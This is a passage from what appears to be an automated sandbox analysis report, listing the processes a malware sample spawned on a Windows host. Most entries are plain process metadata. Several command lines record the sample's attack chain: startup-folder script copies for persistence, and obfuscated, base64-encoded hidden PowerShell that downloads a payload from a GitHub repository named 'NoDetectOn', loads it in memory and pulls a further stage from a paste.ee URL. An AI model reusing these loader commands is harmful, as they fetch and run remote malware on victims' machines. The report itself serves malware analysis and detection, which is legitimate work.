                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:40
                                                                                                        Start time:20:15:27
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:41
                                                                                                        Start time:20:15:27
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:42
                                                                                                        Start time:20:15:27
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:ping 127.0.0.1 -n 10
                                                                                                        Imagebase:0x7ff6cbef0000
                                                                                                        File size:22'528 bytes
                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:43
                                                                                                        Start time:20:15:29
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:44
                                                                                                        Start time:20:15:36
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js"
                                                                                                        Imagebase:0x7ff7d3820000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:45
                                                                                                        Start time:20:15:36
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:47
                                                                                                        Start time:20:15:39
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:48
                                                                                                        Start time:20:15:39
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:49
                                                                                                        Start time:20:15:39
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:ping 127.0.0.1 -n 10
                                                                                                        Imagebase:0x7ff6cbef0000
                                                                                                        File size:22'528 bytes
                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:50
                                                                                                        Start time:20:15:41
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:51
                                                                                                        Start time:20:15:41
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:52
                                                                                                        Start time:20:15:41
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:53
                                                                                                        Start time:20:15:48
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:54
                                                                                                        Start time:20:15:54
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:55
                                                                                                        Start time:20:15:54
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:56
                                                                                                        Start time:20:15:54
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:57
                                                                                                        Start time:20:16:13
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                        Imagebase:0x7ff7be880000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:58
                                                                                                        Start time:20:16:14
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
